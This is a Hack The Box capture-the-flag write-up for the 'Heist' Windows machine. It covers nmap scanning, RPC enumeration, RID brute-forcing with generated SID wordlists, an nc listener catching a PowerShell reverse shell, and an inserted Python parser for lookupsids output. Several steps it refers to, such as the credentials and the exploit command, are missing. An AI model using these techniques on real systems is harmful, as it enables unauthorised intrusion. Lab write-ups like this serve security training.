┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p1-10000 $ip -Pn -n --disable-arp-ping -vv --min-rate 10000
PORT STATE SERVICE REASON
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
445/tcp open microsoft-ds syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p80,135,445,5985 $ip -sCV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-06T23:55:49
|_ start_date: N/A
We can see that SMB enumeration failed, so I switched to RPC, but that failed as well.
RPC
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
HTTP
Web page at http://10.10.10.149/login.php
I tried supplying default credentials, but the login button didn't send any request to the backend server. However, "Login as guest" caught my attention, so I clicked it.
It took me to http://10.10.10.149/issues.php as shown above.
From this page I could extract some useful information:
usernames: Hazard, Support Admin
Attachment: http://10.10.10.149/attachments/config.txt
If you have configured a Cisco router before, you will be familiar with this syntax and these commands. We can extract additional information:
I had no options left except enumerating RPC with Hazard's credentials. I tried several commands to enumerate the machine, but only these two worked:
So, the domain SID is S-1-5-21-4254423774-1266059056-3197185112, and the RID is appended to the end of it. I wanted to enumerate users on the machine, but enumdomusers failed; however, lookupnames and lookupsids can be used for that purpose.
A user SID consists of two parts:
SID of the domain
RID of the user
I knew from previous experience that RIDs start at 500, which is the Administrator's RID, and regular users start from 1000, so I will generate a wordlist with {500..510} for admin accounts and {1000..1100} for regular users.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for rid in {500..510};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids.txt;done
for rid in {1000..1100};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids1.txt;done
Loop over the two wordlists, redirect the output to results.txt, and then read the files.
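As an added example (not part of the original writeup), a small Python parser for the rpcclient lookupsids output collected in results.txt: it splits each SID into the domain SID and RID, drops the *unknown* entries for RIDs that resolve to nothing, and labels well-known RIDs so the resolved accounts can be reviewed at a glance. The sample lines and the EXAMPLE host name are constructed; only the domain SID comes from the writeup.

```python
import re
from dataclasses import dataclass

# Constructed sample of rpcclient "lookupsids" output as it would appear in results.txt.
# Host and account names are made up; the domain SID is the one recovered above.
SAMPLE_RESULTS = """\
S-1-5-21-4254423774-1266059056-3197185112-500 EXAMPLE\\Administrator (1)
S-1-5-21-4254423774-1266059056-3197185112-501 EXAMPLE\\Guest (1)
S-1-5-21-4254423774-1266059056-3197185112-502 *unknown*\\*unknown* (8)
S-1-5-21-4254423774-1266059056-3197185112-513 EXAMPLE\\None (2)
S-1-5-21-4254423774-1266059056-3197185112-1001 EXAMPLE\\alice (1)
S-1-5-21-4254423774-1266059056-3197185112-1002 *unknown*\\*unknown* (8)
"""

# SID_NAME_USE values that rpcclient prints in parentheses after each name.
SID_TYPE = {1: "user", 2: "group", 4: "alias", 5: "well-known group", 8: "unknown"}
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest", 513: "Domain Users"}

# <domain SID>-<RID> <domain>\<name> (<type>)
LINE_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)\s+([^\\\s]+)\\(\S+)\s+\((\d+)\)$")


@dataclass
class Account:
    domain_sid: str
    rid: int
    domain: str
    name: str
    sid_type: str


def parse_lookupsids(text):
    """Parse lookupsids lines into Account records, skipping SIDs that did not resolve."""
    found = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        domain_sid, rid, domain, name, kind = m.groups()
        kind = int(kind)
        if kind == 8:  # *unknown* means no principal exists with this RID
            continue
        found.append(Account(domain_sid, int(rid), domain, name, SID_TYPE.get(kind, f"type {kind}")))
    return found


def user_accounts(accounts):
    """Keep only resolved user principals (type 1); groups and aliases are dropped."""
    return [a for a in accounts if a.sid_type == "user"]


def describe(account):
    """Human-readable summary, flagging well-known RIDs and the 1000+ range for regular accounts."""
    label = WELL_KNOWN_RIDS.get(account.rid, "regular account" if account.rid >= 1000 else "built-in principal")
    return f"{account.name} (RID {account.rid}, {account.sid_type}, {label})"
```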
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.149] 49716
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Tools>
I didn't find much of interest after landing as Chase, so I ran WinPEAS.exe, and it highlighted these files in red: